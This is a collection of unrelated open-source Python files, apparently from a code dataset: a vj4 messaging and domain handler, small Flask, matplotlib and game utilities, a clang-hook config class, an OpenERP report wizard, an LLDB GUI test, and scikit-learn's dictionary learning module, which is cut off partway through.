self.modify_udoc(udict, mdoc['sender_uid'])
self.modify_udoc(udict, mdoc['sendee_uid'])
self.json_or_render('home_messages.html', messages=mdocs, udict=udict)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
async def post_send_message(self, *, uid: int, content: str):
udoc = await user.get_by_uid(uid, user.PROJECTION_PUBLIC)
if not udoc:
raise error.UserNotFoundError(uid)
mdoc = await message.add(self.user['_id'], udoc['_id'], content)
# TODO(twd2): improve here:
# projection
sender_udoc = await user.get_by_uid(self.user['_id'], user.PROJECTION_PUBLIC)
mdoc['sender_udoc'] = sender_udoc
self.modify_udoc(mdoc, 'sender_udoc')
mdoc['sendee_udoc'] = udoc
self.modify_udoc(mdoc, 'sendee_udoc')
if self.user['_id'] != uid:
await bus.publish('message_received-' + str(uid), {'type': 'new', 'data': mdoc})
self.json_or_redirect(self.url, mdoc=mdoc)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
async def post_reply_message(self, *, message_id: objectid.ObjectId, content: str):
mdoc, reply = await message.add_reply(message_id, self.user['_id'], content)
if not mdoc:
return error.MessageNotFoundError(message_id)
if mdoc['sender_uid'] != mdoc['sendee_uid']:
if mdoc['sender_uid'] == self.user['_id']:
other_uid = mdoc['sendee_uid']
else:
other_uid = mdoc['sender_uid']
mdoc['reply'] = [reply]
await bus.publish('message_received-' + str(other_uid), {'type': 'reply', 'data': mdoc})
self.json_or_redirect(self.url, reply=reply)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
async def post_delete_message(self, *, message_id: objectid.ObjectId):
await message.delete(message_id, self.user['_id'])
self.json_or_redirect(self.url)
@app.connection_route('/home/messages-conn', 'home_messages-conn', global_route=True)
class HomeMessagesConnection(base.Connection):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def on_open(self):
await super(HomeMessagesConnection, self).on_open()
bus.subscribe(self.on_message_received, ['message_received-' + str(self.user['_id'])])
async def on_message_received(self, e):
self.send(**e['value'])
async def on_close(self):
bus.unsubscribe(self.on_message_received)
@app.route('/home/domain', 'home_domain', global_route=True)
class HomeDomainHandler(base.Handler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
pending_ddocs = await domain.get_pending(owner_uid=self.user['_id']) \
.to_list()
dudict = await domain.get_dict_user_by_domain_id(self.user['_id'])
dids = list(dudict.keys())
ddocs = await domain.get_multi(_id={'$in': dids}) \
.to_list()
can_manage = {}
for ddoc in builtin.DOMAINS + ddocs:
role = dudict.get(ddoc['_id'], {}).get('role', builtin.ROLE_DEFAULT)
mask = domain.get_all_roles(ddoc).get(role, builtin.PERM_NONE)
can_manage[ddoc['_id']] = (
((builtin.PERM_EDIT_DESCRIPTION | builtin.PERM_EDIT_PERM) & mask) != 0
or self.has_priv(builtin.PRIV_MANAGE_ALL_DOMAIN))
self.render('home_domain.html', pending_ddocs=pending_ddocs, ddocs=ddocs, dudict=dudict, can_manage=can_manage)
@base.post_argument
@base.require_csrf_token
@base.sanitize
async def post(self, *, domain_id: str):
await domain.add_continue(domain_id, self.user['_id'])
self.json_or_redirect(self.url)
@app.route('/home/domain/create', 'home_domain_create', global_route=True)
class HomeDomainCreateHandler(base.Handler):
@base.require_priv(builtin.PRIV_CREATE_DOMAIN)
async def get(self):
self.render('home_domain_create.html')
@base.require_priv(builtin.PRIV_CREATE_DOMAIN)
@base.post_argument
@base.require_csrf_token
@base.sanitize
async def post(self, *, id: str, name: str, gravatar: str, bulletin: str):
domain_id = await domain.add(id, self.user['_id'], name=name,
gravatar=gravatar, bulletin=bulletin)
self.json_or_redirect(self.reverse_url('domain_manage', domain_id=domain_id))
@app.route('/home/file', 'home_file', global_route=True)
class HomeFileHandler(base.OperationHandler):
def file_url(self, fdoc):
return options.cdn_prefix.rstrip('/') + \
self.reverse_url('fs_get', domain_id=builtin.DOMAIN_ID_SYSTEM,
secret=fdoc['metadata']['secret'])
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
ufdocs = await userfile.get_multi(owner_uid=self.user['_id']).to_list()
fdict = await fs.get_meta_dict(ufdoc.get('file_id') for ufdoc in ufdocs)
self.render('home_file.html', ufdocs=ufdocs, fdict=fdict)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.post_argument
@base.require_csrf_token
@base.sanitize
async def post_delete(self, *, ufid: document.convert_doc_id):
ufdoc = await userfile.get(ufid)
if not self.own(ufdoc, priv=builtin.PRIV_DELETE_FILE_SELF):
self.check_priv(builtin.PRIV_DELETE_FILE)
result = await userfile.delete(ufdoc['doc_id'])
if result:
await userfile.dec_usage(self.user['_id'], ufdoc['length'])
self.redirect(self.referer_or_main)
| vijos/vj4 | vj4/handler/home.py | Python | agpl-3.0 | 12,558 |
from models import db
from models.Post import Post
class PostFile(db.Model):
__tablename__ = 'PostFile'
Id = db.Column(db.Integer, primary_key = True)
Post = db.Column(db.Integer, db.ForeignKey(Post.Id))
FileName = db.Column(db.String(128))
def __init__(self, post, file):
self.Post = post
self.FileName = file
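# Illustrative usage sketch (assumes a Flask application context and an existing Post
# row; the file name is invented for the example):
#     attachment = PostFile(post.Id, 'photo.png')
#     db.session.add(attachment)
#     db.session.commit()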
| goors/flask-microblog | models/PostFile.py | Python | apache-2.0 | 335 |
import matplotlib.pyplot as plt
import numpy as np
data = np.loadtxt(open("csv files/GT_T_009991.csv","rb"),delimiter=",",skiprows=0)
# arr=[[1,3],[1,2],[2,3],[1,4]]
arr=[]
for a in range(len(data)):
for b in range(len(data[a])):
if data[a][b] !=0:
arr.append([a+1,b+1,data[a][b]])
# print arr
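# Scatter-plot every (row, column) position whose cell value equals 2880; arr holds
# 1-based [row, column, value] triples for the non-zero cells collected above.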
for x in arr:
if x[2] == 2880:
plt.scatter(x[0],x[1])
print "scatter success: %d" % (x[0])
plt.show() | wyfzeqw/Environmental-Influence-on-Crowd-Dynamics | Project/plotter.py | Python | mit | 413 |
import gdata
import glob, math
from ige.ospace.Const import *
smallStarImgs = None
techImgs = None
bigStarImgs = None
planetImgs = None
cmdInProgressImg = None
loginLogoImg = None
structProblemImg = None
structOffImg = None
icons = {}
def getUnknownName():
return _('[Unknown]')
def getNA():
return _('N/A')
def formatTime(time):
time = int(math.ceil(time))
sign = ''
if time < 0:
time = - time
sign = '-'
days = time / 24
hours = time % 24
return '%s%d:%02d' % (sign, days, hours)
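# Worked examples for formatTime (assuming Python 2 integer division, as used above):
#   formatTime(25)  -> '1:01'   (25 hours = 1 day, 1 hour)
#   formatTime(-30) -> '-1:06'  (sign handled separately, then 30 hours = 1 day, 6 hours)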
def formatBE(b, e):
return '%d / %d' % (b, e)
| mozts2005/OuterSpace | client-msg-wx/lib/res.py | Python | gpl-2.0 | 578 |
"""Configuration of clang-hook."""
from .stage import Str_to_stage
from .config import BaseConfig
from .filter import Filter
class HookConfig(BaseConfig):
"""Configuration of clang-hook."""
__slots__ = ("data", "load", "passes", "link_flags", "error_log", "info_log", "debug_log", "log", "output_file",
"output_stages", "report_file", "filters")
def __init__(self):
self.load = None
self.passes = None
self.link_flags = None
self.error_log = None
self.info_log = None
self.debug_log = None
self.log = None
self.output_file = None
self.output_stages = None
self.report_file = None
self.filters = None
super(HookConfig, self).__init__()
    def init(self, info_logger, name=None, debug=False, arg_path=None):
        """Search for the config file and parse it. For test purposes, this function won't be called, allowing the test
suite to put arbitrary values in attributes."""
super(HookConfig, self).init(info_logger, "clang-hook" if name is None else name, debug, arg_path)
    def parse_config(self):
        """Parse the configuration dictionary and apply default values for missing keys."""
self.load = self.data.get("load", [])
self.passes = self.data.get("passes", [])
self.link_flags = self.data.get("link_flags", [])
self.error_log = self.data.get("error_log", None)
self.info_log = self.data.get("info_log", None)
self.debug_log = self.data.get("debug_log", None)
self.log = bool(self.data.get("log", True))
self.output_file = self.data.get("output_file", None)
output_stages = self.data.get("output_stages", None)
if output_stages is not None:
self.output_stages = set(Str_to_stage(stage) for stage in output_stages)
else:
self.output_stages = None
self.report_file = self.data.get("report_file", None)
self.filters = [Filter(f) for f in self.data.get("filters", [])]
@classmethod
    def get_config_path_variable(cls):
        """Returns the environment variable containing the path of the configuration file."""
return 'CLANG_HOOK_CONFIG'
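# Illustrative sketch (not taken from the project's documentation): parse_config()
# reads the keys below from self.data; anything missing falls back to the defaults
# shown in the method above. A hypothetical configuration could therefore look like:
#
#     {
#         "load": ["libMyPass.so"],      # shared objects to load (file name invented)
#         "passes": ["-my-pass"],        # pass flags to forward (flag name invented)
#         "link_flags": ["-lm"],
#         "log": true,
#         "error_log": "hook-error.log",
#         "report_file": "report.json",
#         "filters": []
#     }
#
# How the file is located and loaded into self.data is handled by BaseConfig.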
| s-i-newton/clang-hook | lib_hook/hook_config.py | Python | apache-2.0 | 2,224 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv, fields
class account_analytic_cost_ledger(osv.osv_memory):
_name = 'account.analytic.cost.ledger'
_description = 'Account Analytic Cost Ledger'
_columns = {
'date1': fields.date('Start of period', required=True),
'date2': fields.date('End of period', required=True),
}
_defaults = {
'date1': lambda *a: time.strftime('%Y-01-01'),
'date2': lambda *a: time.strftime('%Y-%m-%d')
}
def check_report(self, cr, uid, ids, context=None):
if context is None:
context = {}
data = self.read(cr, uid, ids)[0]
datas = {
'ids': context.get('active_ids',[]),
'model': 'account.analytic.account',
'form': data
}
datas['form']['active_ids'] = context.get('active_ids', False)
return self.pool['report'].get_action(cr, uid, [], 'account.report_analyticcostledger', data=datas, context=context)
| addition-it-solutions/project-all | addons/analytic/wizard/account_analytic_cost_ledger_report.py | Python | agpl-3.0 | 1,959 |
# You have to perform N operations on a queue of the following types: E x : Enqueue x in the queue and
# print the new size of the queue. D : Dequeue from the queue and print the element that is deleted and
# the new size of the queue separated by a space. If there is no element in the queue, then print −1 in
# place of the deleted element.
#
# Input format
# First line: N
# Next N lines: One of the above operations
#
# Output format
# Enqueue operation: Print the new size of the queue
# Dequeue operation: Print two integers, the deleted element and the new size of the queue. If the queue is
# empty, print −1 and the new size of the queue.
#
# Constraints
# 1≤N≤100
# 1≤x≤100
#
# SAMPLE INPUT
# 5
# E 2
# D
# D
# E 3
# D
#
# SAMPLE OUTPUT
# 1
# 2 0
# -1 0
# 1
# 3 0
def enqueue(myList, element):
myList.insert(0, element)
def dequeue(myList):
if len(myList) > 0:
return myList.pop()
else:
return -1
myList = []
for _ in range(int(input())):
userInput = input().split()
if userInput[0] == 'E':
enqueue(myList, int(userInput[1]))
print(len(myList))
else:
deleted = dequeue(myList)
print(deleted, len(myList))
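# Alternative sketch (not part of the required solution): collections.deque offers
# O(1) appends and pops at both ends, whereas list.insert(0, x) above is O(n) per enqueue.
# from collections import deque
# queue = deque()
# queue.append(2)                      # enqueue 2 -> len(queue) == 1
# print(queue.popleft(), len(queue))   # dequeue   -> prints "2 0"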
| OmkarPathak/Python-Programs | CompetitiveProgramming/HackerEarth/DataStructures/Queue/P01_Queue.py | Python | gpl-3.0 | 1,181 |
# Copyright (c) 2015-2018 Mark Hamilton, All rights reserved
"""
Provides general settings for testpool.
"""
import os
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
##
# Location of the test database root directory.
TEST_DBSITE_DIR = os.path.abspath(os.path.join(BASE_DIR, "db"))
PLUGINS = {
'testpool.libexec',
}
##
# log formatting
FMT = '%(asctime)s:%(name)s:%(levelname)s:%(message)s'
CFG_FILE = "/etc/testpool/testpool.yml"
| testcraftsman/testpool | testpool/settings.py | Python | gpl-3.0 | 447 |
"""
Test that the 'gui' displays long lines/names correctly without overruns.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test.lldbpexpect import PExpectTest
class GuiViewLargeCommandTest(PExpectTest):
mydir = TestBase.compute_mydir(__file__)
# PExpect uses many timeouts internally and doesn't play well
# under ASAN on a loaded machine..
@skipIfAsan
@skipIfCursesSupportMissing
@skipIfRemote # "run" command will not work correctly for remote debug
def test_gui(self):
self.build()
# Limit columns to 80, so that long lines will not be displayed completely.
self.launch(executable=self.getBuildArtifact("a.out"), dimensions=(100,80))
self.expect('br set -f main.c -p "// Break here"', substrs=["Breakpoint 1", "address ="])
self.expect("run", substrs=["stop reason ="])
escape_key = chr(27).encode()
left_key = chr(27)+'OD' # for vt100 terminal (lldbexpect sets TERM=vt100)
right_key = chr(27)+'OC'
ctrl_l = chr(12)
# Start the GUI and close the welcome window.
self.child.sendline("gui")
self.child.send(escape_key)
# Check the sources window.
self.child.expect_exact("Sources")
# The string is copy&pasted from a 80-columns terminal. It will be followed by some
# kind of an escape sequence (color, frame, etc.).
self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooo"+chr(27))
# The escape here checks that there's no content drawn by the previous line.
self.child.expect_exact("int shortvar = 1;"+chr(27))
# Check the triggered breakpoint marker on a long line.
self.child.expect_exact("<<< Thread 1: breakpoint 1.1"+chr(27))
# Check the variable window.
self.child.expect_exact("Variables")
self.child.expect_exact("(int) a_variable_with_a_very_looooooooooooooooooooooooooooooo"+chr(27))
self.child.expect_exact("(int) shortvar = 1"+chr(27))
# Scroll the sources view twice to the right.
self.child.send(right_key)
self.child.send(right_key)
# Force a redraw, otherwise curses will optimize the drawing to not draw all 'o'.
self.child.send(ctrl_l)
# The source code is indented by two spaces, so there'll be just two extra 'o' on the right.
self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooooo"+chr(27))
# And scroll back to the left.
self.child.send(left_key)
self.child.send(left_key)
self.child.send(ctrl_l)
self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooo"+chr(27))
# Press escape to quit the gui
self.child.send(escape_key)
self.expect_prompt()
self.quit()
| google/llvm-propeller | lldb/test/API/commands/gui/viewlarge/TestGuiViewLarge.py | Python | apache-2.0 | 2,891 |
""" Dictionary learning
"""
from __future__ import print_function
# Author: Vlad Niculae, Gael Varoquaux, Alexandre Gramfort
# License: BSD 3 clause
import time
import sys
import itertools
from math import sqrt, floor, ceil
import numpy as np
from scipy import linalg
from numpy.lib.stride_tricks import as_strided
from ..base import BaseEstimator, TransformerMixin
from ..externals.joblib import Parallel, delayed, cpu_count
from ..externals.six.moves import zip
from ..utils import array2d, check_random_state, gen_even_slices
from ..utils.extmath import randomized_svd
from ..linear_model import Lasso, orthogonal_mp_gram, LassoLars, Lars
def _sparse_encode(X, dictionary, gram, cov=None, algorithm='lasso_lars',
regularization=None, copy_cov=True,
init=None, max_iter=1000):
"""Generic sparse coding
    Each row of the result is the solution to a Lasso problem.
Parameters
----------
X: array of shape (n_samples, n_features)
Data matrix.
dictionary: array of shape (n_components, n_features)
The dictionary matrix against which to solve the sparse coding of
the data. Some of the algorithms assume normalized rows.
gram: None | array, shape=(n_components, n_components)
Precomputed Gram matrix, dictionary * dictionary'
gram can be None if method is 'threshold'.
cov: array, shape=(n_components, n_samples)
Precomputed covariance, dictionary * X'
algorithm: {'lasso_lars', 'lasso_cd', 'lars', 'omp', 'threshold'}
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than regularization
from the projection dictionary * data'
regularization : int | float
The regularization parameter. It corresponds to alpha when
algorithm is 'lasso_lars', 'lasso_cd' or 'threshold'.
Otherwise it corresponds to n_nonzero_coefs.
init: array of shape (n_samples, n_components)
Initialization value of the sparse code. Only used if
`algorithm='lasso_cd'`.
max_iter: int, 1000 by default
Maximum number of iterations to perform if `algorithm='lasso_cd'`.
copy_cov: boolean, optional
Whether to copy the precomputed covariance matrix; if False, it may be
overwritten.
Returns
-------
    code: array of shape (n_samples, n_components)
The sparse codes
See also
--------
sklearn.linear_model.lars_path
sklearn.linear_model.orthogonal_mp
sklearn.linear_model.Lasso
SparseCoder
"""
if X.ndim == 1:
X = X[:, np.newaxis]
n_samples, n_features = X.shape
if cov is None and algorithm != 'lasso_cd':
# overwriting cov is safe
copy_cov = False
cov = np.dot(dictionary, X.T)
if algorithm == 'lasso_lars':
alpha = float(regularization) / n_features # account for scaling
try:
err_mgt = np.seterr(all='ignore')
lasso_lars = LassoLars(alpha=alpha, fit_intercept=False,
verbose=False, normalize=False,
precompute=gram, fit_path=False)
lasso_lars.fit(dictionary.T, X.T, Xy=cov)
new_code = lasso_lars.coef_
finally:
np.seterr(**err_mgt)
elif algorithm == 'lasso_cd':
alpha = float(regularization) / n_features # account for scaling
clf = Lasso(alpha=alpha, fit_intercept=False, precompute=gram,
max_iter=max_iter, warm_start=True)
clf.coef_ = init
clf.fit(dictionary.T, X.T)
new_code = clf.coef_
elif algorithm == 'lars':
try:
err_mgt = np.seterr(all='ignore')
lars = Lars(fit_intercept=False, verbose=False, normalize=False,
precompute=gram, n_nonzero_coefs=int(regularization),
fit_path=False)
lars.fit(dictionary.T, X.T, Xy=cov)
new_code = lars.coef_
finally:
np.seterr(**err_mgt)
elif algorithm == 'threshold':
new_code = ((np.sign(cov) *
np.maximum(np.abs(cov) - regularization, 0)).T)
elif algorithm == 'omp':
norms_squared = np.sum((X ** 2), axis=1)
new_code = orthogonal_mp_gram(gram, cov, regularization, None,
norms_squared, copy_Xy=copy_cov).T
else:
        raise ValueError('Sparse coding method must be "lasso_lars", '
                         '"lasso_cd", "lars", "threshold" or "omp", got %s.'
% algorithm)
return new_code
# XXX : could be moved to the linear_model module
def sparse_encode(X, dictionary, gram=None, cov=None, algorithm='lasso_lars',
n_nonzero_coefs=None, alpha=None, copy_cov=True, init=None,
max_iter=1000, n_jobs=1):
"""Sparse coding
Each row of the result is the solution to a sparse coding problem.
The goal is to find a sparse array `code` such that::
X ~= code * dictionary
Parameters
----------
X: array of shape (n_samples, n_features)
Data matrix
dictionary: array of shape (n_components, n_features)
The dictionary matrix against which to solve the sparse coding of
the data. Some of the algorithms assume normalized rows for meaningful
output.
gram: array, shape=(n_components, n_components)
Precomputed Gram matrix, dictionary * dictionary'
cov: array, shape=(n_components, n_samples)
        Precomputed covariance, dictionary * X'
algorithm: {'lasso_lars', 'lasso_cd', 'lars', 'omp', 'threshold'}
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than alpha from
the projection dictionary * X'
n_nonzero_coefs: int, 0.1 * n_features by default
Number of nonzero coefficients to target in each column of the
solution. This is only used by `algorithm='lars'` and `algorithm='omp'`
and is overridden by `alpha` in the `omp` case.
alpha: float, 1. by default
If `algorithm='lasso_lars'` or `algorithm='lasso_cd'`, `alpha` is the
penalty applied to the L1 norm.
        If `algorithm='threshold'`, `alpha` is the absolute value of the
threshold below which coefficients will be squashed to zero.
If `algorithm='omp'`, `alpha` is the tolerance parameter: the value of
the reconstruction error targeted. In this case, it overrides
`n_nonzero_coefs`.
init: array of shape (n_samples, n_components)
Initialization value of the sparse codes. Only used if
`algorithm='lasso_cd'`.
max_iter: int, 1000 by default
Maximum number of iterations to perform if `algorithm='lasso_cd'`.
copy_cov: boolean, optional
Whether to copy the precomputed covariance matrix; if False, it may be
overwritten.
n_jobs: int, optional
Number of parallel jobs to run.
Returns
-------
code: array of shape (n_samples, n_components)
The sparse codes
See also
--------
sklearn.linear_model.lars_path
sklearn.linear_model.orthogonal_mp
sklearn.linear_model.Lasso
SparseCoder
"""
dictionary = array2d(dictionary)
X = array2d(X)
n_samples, n_features = X.shape
n_components = dictionary.shape[0]
if gram is None and algorithm != 'threshold':
gram = np.dot(dictionary, dictionary.T)
if cov is None:
copy_cov = False
cov = np.dot(dictionary, X.T)
if algorithm in ('lars', 'omp'):
regularization = n_nonzero_coefs
if regularization is None:
regularization = max(n_features / 10, 1)
else:
regularization = alpha
if regularization is None:
regularization = 1.
if n_jobs == 1 or algorithm == 'threshold':
return _sparse_encode(X, dictionary, gram, cov=cov,
algorithm=algorithm,
regularization=regularization, copy_cov=copy_cov,
init=init, max_iter=max_iter)
# Enter parallel code block
code = np.empty((n_samples, n_components))
slices = list(gen_even_slices(n_samples, n_jobs))
code_views = Parallel(n_jobs=n_jobs)(
delayed(_sparse_encode)(
X[this_slice], dictionary, gram, cov[:, this_slice], algorithm,
regularization=regularization, copy_cov=copy_cov,
init=init[this_slice] if init is not None else None,
max_iter=max_iter)
for this_slice in slices)
for this_slice, this_view in zip(slices, code_views):
code[this_slice] = this_view
return code
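# Minimal usage sketch (illustrative comment, not part of the library source): encode
# two samples against a row-normalized random dictionary with OMP, one atom per sample.
# import numpy as np
# rng = np.random.RandomState(0)
# D = rng.randn(5, 8)
# D /= np.sqrt((D ** 2).sum(axis=1))[:, np.newaxis]    # normalize dictionary rows
# X = rng.randn(2, 8)
# codes = sparse_encode(X, D, algorithm='omp', n_nonzero_coefs=1)
# codes.shape == (2, 5)                                # (n_samples, n_components)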
def _update_dict(dictionary, Y, code, verbose=False, return_r2=False,
random_state=None):
"""Update the dense dictionary factor in place.
Parameters
----------
dictionary: array of shape (n_features, n_components)
Value of the dictionary at the previous iteration.
Y: array of shape (n_features, n_samples)
Data matrix.
code: array of shape (n_components, n_samples)
Sparse coding of the data against which to optimize the dictionary.
verbose:
Degree of output the procedure will print.
return_r2: bool
Whether to compute and return the residual sum of squares corresponding
to the computed solution.
random_state: int or RandomState
Pseudo number generator state used for random sampling.
Returns
-------
dictionary: array of shape (n_features, n_components)
Updated dictionary.
"""
n_components = len(code)
n_samples = Y.shape[0]
random_state = check_random_state(random_state)
# Residuals, computed 'in-place' for efficiency
R = -np.dot(dictionary, code)
R += Y
R = np.asfortranarray(R)
ger, = linalg.get_blas_funcs(('ger',), (dictionary, code))
for k in range(n_components):
# R <- 1.0 * U_k * V_k^T + R
R = ger(1.0, dictionary[:, k], code[k, :], a=R, overwrite_a=True)
dictionary[:, k] = np.dot(R, code[k, :].T)
# Scale k'th atom
atom_norm_square = np.dot(dictionary[:, k], dictionary[:, k])
if atom_norm_square < 1e-20:
if verbose == 1:
sys.stdout.write("+")
sys.stdout.flush()
elif verbose:
print("Adding new random atom")
dictionary[:, k] = random_state.randn(n_samples)
# Setting corresponding coefs to 0
code[k, :] = 0.0
dictionary[:, k] /= sqrt(np.dot(dictionary[:, k],
dictionary[:, k]))
else:
dictionary[:, k] /= sqrt(atom_norm_square)
# R <- -1.0 * U_k * V_k^T + R
R = ger(-1.0, dictionary[:, k], code[k, :], a=R, overwrite_a=True)
if return_r2:
R **= 2
# R is fortran-ordered. For numpy version < 1.6, sum does not
# follow the quick striding first, and is thus inefficient on
# fortran ordered data. We take a flat view of the data with no
# striding
R = as_strided(R, shape=(R.size, ), strides=(R.dtype.itemsize,))
R = np.sum(R)
return dictionary, R
return dictionary
def dict_learning(X, n_components, alpha, max_iter=100, tol=1e-8,
method='lars', n_jobs=1, dict_init=None, code_init=None,
callback=None, verbose=False, random_state=None):
"""Solves a dictionary learning matrix factorization problem.
Finds the best dictionary and the corresponding sparse code for
approximating the data matrix X by solving::
(U^*, V^*) = argmin 0.5 || X - U V ||_2^2 + alpha * || U ||_1
(U,V)
with || V_k ||_2 = 1 for all 0 <= k < n_components
where V is the dictionary and U is the sparse code.
Parameters
----------
X: array of shape (n_samples, n_features)
Data matrix.
n_components: int,
Number of dictionary atoms to extract.
alpha: int,
Sparsity controlling parameter.
max_iter: int,
Maximum number of iterations to perform.
tol: float,
Tolerance for the stopping condition.
method: {'lars', 'cd'}
lars: uses the least angle regression method to solve the lasso problem
(linear_model.lars_path)
cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). Lars will be faster if
the estimated components are sparse.
n_jobs: int,
Number of parallel jobs to run, or -1 to autodetect.
dict_init: array of shape (n_components, n_features),
Initial value for the dictionary for warm restart scenarios.
code_init: array of shape (n_samples, n_components),
Initial value for the sparse code for warm restart scenarios.
callback:
Callable that gets invoked every five iterations.
verbose:
Degree of output the procedure will print.
random_state: int or RandomState
Pseudo number generator state used for random sampling.
Returns
-------
code: array of shape (n_samples, n_components)
The sparse code factor in the matrix factorization.
dictionary: array of shape (n_components, n_features),
The dictionary factor in the matrix factorization.
errors: array
Vector of errors at each iteration.
See also
--------
dict_learning_online
DictionaryLearning
MiniBatchDictionaryLearning
SparsePCA
MiniBatchSparsePCA
"""
if method not in ('lars', 'cd'):
raise ValueError('Coding method %r not supported as a fit algorithm.'
% method)
method = 'lasso_' + method
t0 = time.time()
# Avoid integer division problems
alpha = float(alpha)
random_state = check_random_state(random_state)
if n_jobs == -1:
n_jobs = cpu_count()
# Init the code and the dictionary with SVD of Y
if code_init is not None and dict_init is not None:
code = np.array(code_init, order='F')
# Don't copy V, it will happen below
dictionary = dict_init
else:
code, S, dictionary = linalg.svd(X, full_matrices=False)
dictionary = S[:, np.newaxis] * dictionary
r = len(dictionary)
if n_components <= r: # True even if n_components=None
code = code[:, :n_components]
dictionary = dictionary[:n_components, :]
else:
code = np.c_[code, np.zeros((len(code), n_components - r))]
dictionary = np.r_[dictionary,
np.zeros((n_components - r, dictionary.shape[1]))]
# Fortran-order dict, as we are going to access its row vectors
dictionary = np.array(dictionary, order='F')
residuals = 0
errors = []
current_cost = np.nan
if verbose == 1:
print('[dict_learning]', end=' ')
for ii in range(max_iter):
dt = (time.time() - t0)
if verbose == 1:
sys.stdout.write(".")
sys.stdout.flush()
elif verbose:
print ("Iteration % 3i "
"(elapsed time: % 3is, % 4.1fmn, current cost % 7.3f)"
% (ii, dt, dt / 60, current_cost))
# Update code
code = sparse_encode(X, dictionary, algorithm=method, alpha=alpha,
init=code, n_jobs=n_jobs)
# Update dictionary
dictionary, residuals = _update_dict(dictionary.T, X.T, code.T,
verbose=verbose, return_r2=True,
random_state=random_state)
dictionary = dictionary.T
# Cost function
current_cost = 0.5 * residuals + alpha * np.sum(np.abs(code))
errors.append(current_cost)
if ii > 0:
dE = errors[-2] - errors[-1]
# assert(dE >= -tol * errors[-1])
if dE < tol * errors[-1]:
if verbose == 1:
# A line return
print("")
elif verbose:
print("--- Convergence reached after %d iterations" % ii)
break
if ii % 5 == 0 and callback is not None:
callback(locals())
return code, dictionary, errors
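# Usage sketch (illustrative comment): factor a small data matrix into 3 atoms;
# X is then approximately np.dot(code, dictionary).
# code, dictionary, errors = dict_learning(X, n_components=3, alpha=1.0, max_iter=20)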
def dict_learning_online(X, n_components=2, alpha=1, n_iter=100,
return_code=True, dict_init=None, callback=None,
batch_size=3, verbose=False, shuffle=True, n_jobs=1,
method='lars', iter_offset=0, random_state=None):
"""Solves a dictionary learning matrix factorization problem online.
Finds the best dictionary and the corresponding sparse code for
approximating the data matrix X by solving::
(U^*, V^*) = argmin 0.5 || X - U V ||_2^2 + alpha * || U ||_1
(U,V)
with || V_k ||_2 = 1 for all 0 <= k < n_components
where V is the dictionary and U is the sparse code. This is
accomplished by repeatedly iterating over mini-batches by slicing
the input data.
Parameters
----------
X: array of shape (n_samples, n_features)
Data matrix.
n_components : int,
Number of dictionary atoms to extract.
alpha : int,
Sparsity controlling parameter.
n_iter : int,
Number of iterations to perform.
return_code : boolean,
Whether to also return the code U or just the dictionary V.
dict_init : array of shape (n_components, n_features),
Initial value for the dictionary for warm restart scenarios.
callback :
Callable that gets invoked every five iterations.
batch_size : int,
The number of samples to take in each batch.
verbose :
Degree of output the procedure will print.
shuffle : boolean,
Whether to shuffle the data before splitting it in batches.
n_jobs : int,
Number of parallel jobs to run, or -1 to autodetect.
method : {'lars', 'cd'}
lars: uses the least angle regression method to solve the lasso problem
(linear_model.lars_path)
cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). Lars will be faster if
the estimated components are sparse.
iter_offset : int, default 0
Number of previous iterations completed on the dictionary used for
initialization.
random_state : int or RandomState
Pseudo number generator state used for random sampling.
Returns
-------
code : array of shape (n_samples, n_components),
the sparse code (only returned if `return_code=True`)
dictionary : array of shape (n_components, n_features),
the solutions to the dictionary learning problem
See also
--------
dict_learning
DictionaryLearning
MiniBatchDictionaryLearning
SparsePCA
MiniBatchSparsePCA
"""
if method not in ('lars', 'cd'):
raise ValueError('Coding method not supported as a fit algorithm.')
method = 'lasso_' + method
t0 = time.time()
n_samples, n_features = X.shape
# Avoid integer division problems
alpha = float(alpha)
random_state = check_random_state(random_state)
if n_jobs == -1:
n_jobs = cpu_count()
# Init V with SVD of X
if dict_init is not None:
dictionary = dict_init
else:
_, S, dictionary = randomized_svd(X, n_components)
dictionary = S[:, np.newaxis] * dictionary
r = len(dictionary)
if n_components <= r:
dictionary = dictionary[:n_components, :]
else:
dictionary = np.r_[dictionary,
np.zeros((n_components - r, dictionary.shape[1]))]
dictionary = np.ascontiguousarray(dictionary.T)
if verbose == 1:
print('[dict_learning]', end=' ')
n_batches = floor(float(len(X)) / batch_size)
if shuffle:
X_train = X.copy()
random_state.shuffle(X_train)
else:
X_train = X
batches = np.array_split(X_train, n_batches)
batches = itertools.cycle(batches)
